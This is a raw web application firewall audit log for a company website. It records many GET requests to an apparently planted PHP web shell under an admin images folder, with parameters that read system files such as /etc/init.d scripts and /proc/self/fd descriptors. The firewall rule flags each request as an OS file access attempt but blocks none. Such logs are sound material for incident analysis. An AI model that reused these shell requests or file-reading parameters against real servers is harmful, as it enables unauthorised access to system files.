"www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHwIoVQnPDyHnl9oO8DgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108096575527 4153 (- - -) Stopwatch2: 1750108096575527 4153; combined=1989, p1=356, p2=1509, p3=35, p4=32, p5=57, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d205e29-Z-- --8267ad0d-A-- [17/Jun/2025:02:38:42.478861 +0530] aFCH2qEB9lmWsOo-rPOM5QAAAAU 216.73.216.71 52022 127.0.0.1 7081 --8267ad0d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fcryptdisks-early HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --8267ad0d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3427 Connection: close Content-Type: text/html; charset=UTF-8 --8267ad0d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCH2qEB9lmWsOo-rPOM5QAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCH2qEB9lmWsOo-rPOM5QAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108122475406 3511 (- - -) Stopwatch2: 1750108122475406 3511; combined=1981, p1=244, p2=1566, p3=41, p4=43, p5=87, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8267ad0d-Z-- --c9260576-A-- [17/Jun/2025:02:38:56.478954 +0530] aFCH6IoVQnPDyHnl9oO8JwAAAAY 3.94.156.104 38532 127.0.0.1 7081 --c9260576-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/58 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.94.156.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c9260576-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --c9260576-H-- Message: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/58"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/58"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCH6IoVQnPDyHnl9oO8JwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108136474482 4525 (- - -) Stopwatch2: 1750108136474482 4525; combined=2467, p1=365, p2=1974, p3=42, p4=30, p5=56, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c9260576-Z-- --6450494b-A-- [17/Jun/2025:02:39:00.462980 +0530] aFCH7BwcFb_n1P0IC9x-FwAAAAo 44.212.131.50 56734 127.0.0.1 7081 --6450494b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/41 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.212.131.50 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6450494b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --6450494b-H-- Message: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/41"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/41"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCH7BwcFb_n1P0IC9x-FwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108140458969 4062 (- - -) Stopwatch2: 1750108140458969 4062; combined=2083, p1=383, p2=1584, p3=36, p4=26, p5=54, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6450494b-Z-- --19b51c0c-A-- [17/Jun/2025:02:39:24.559248 +0530] aFCIBBwcFb_n1P0IC9x-HQAAAAo 23.21.250.48 46662 127.0.0.1 7081 --19b51c0c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/9 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.21.250.48 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --19b51c0c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --19b51c0c-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/self/fd/9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/self/fd/9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIBBwcFb_n1P0IC9x-HQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108164554991 4311 (- - -) Stopwatch2: 1750108164554991 4311; combined=2236, p1=351, p2=1757, p3=38, p4=29, p5=60, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19b51c0c-Z-- --9887dd12-A-- [17/Jun/2025:02:39:38.134751 +0530] aFCIEooVQnPDyHnl9oO8NwAAAAY 216.73.216.71 58526 127.0.0.1 7081 --9887dd12-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fapache-htcacheclean HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9887dd12-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4004 Connection: close Content-Type: text/html; charset=UTF-8 --9887dd12-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apache-htcacheclean"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIEooVQnPDyHnl9oO8NwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apache-htcacheclean"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIEooVQnPDyHnl9oO8NwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108178130456 4357 (- - -) Stopwatch2: 1750108178130456 4357; combined=2398, p1=422, p2=1822, p3=39, p4=29, p5=86, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9887dd12-Z-- --75235f36-A-- [17/Jun/2025:02:39:39.318511 +0530] aFCIE6EB9lmWsOo-rPONCAAAAAU 216.73.216.71 37570 127.0.0.1 7081 --75235f36-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fkmod HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --75235f36-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3873 Connection: close Content-Type: text/html; charset=UTF-8 --75235f36-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIE6EB9lmWsOo-rPONCAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIE6EB9lmWsOo-rPONCAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108179313865 4699 (- - -) Stopwatch2: 1750108179313865 4699; combined=2240, p1=364, p2=1718, p3=37, p4=30, p5=91, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75235f36-Z-- --973ebd14-A-- [17/Jun/2025:02:39:48.885563 +0530] aFCIHIoVQnPDyHnl9oO8RQAAAAY 216.73.216.71 38658 127.0.0.1 7081 --973ebd14-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fconsole-setup.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --973ebd14-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3436 Connection: close Content-Type: text/html; charset=UTF-8 --973ebd14-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/console-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIHIoVQnPDyHnl9oO8RQAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/console-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIHIoVQnPDyHnl9oO8RQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108188881107 4510 (- - -) Stopwatch2: 1750108188881107 4510; combined=2533, p1=358, p2=1900, p3=42, p4=141, p5=92, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --973ebd14-Z-- --ac302f64-A-- [17/Jun/2025:02:39:49.343275 +0530] aFCIHRwcFb_n1P0IC9x-NAAAAAo 216.73.216.71 43620 127.0.0.1 7081 --ac302f64-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fdbus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ac302f64-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4446 Connection: close Content-Type: text/html; charset=UTF-8 --ac302f64-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIHRwcFb_n1P0IC9x-NAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIHRwcFb_n1P0IC9x-NAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108189338841 4498 (- - -) Stopwatch2: 1750108189338841 4498; combined=2402, p1=370, p2=1868, p3=40, p4=31, p5=93, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac302f64-Z-- --6a33f674-A-- [17/Jun/2025:02:41:18.816170 +0530] aFCIdhwcFb_n1P0IC9x-ZAAAAAo 216.73.216.71 55966 127.0.0.1 7081 --6a33f674-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Frsync HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6a33f674-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4490 Connection: close Content-Type: text/html; charset=UTF-8 --6a33f674-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIdhwcFb_n1P0IC9x-ZAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIdhwcFb_n1P0IC9x-ZAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108278811119 5106 (- - -) Stopwatch2: 1750108278811119 5106; combined=2808, p1=394, p2=2237, p3=55, p4=34, p5=88, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a33f674-Z-- --3ed21c34-A-- [17/Jun/2025:02:41:34.975902 +0530] aFCIho9-jD-p9NsZWnAfhwAAAAE 216.73.216.71 48376 127.0.0.1 7081 --3ed21c34-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fkeyboard-setup.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3ed21c34-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3548 Connection: close Content-Type: text/html; charset=UTF-8 --3ed21c34-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/keyboard-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIho9-jD-p9NsZWnAfhwAAAAE"] 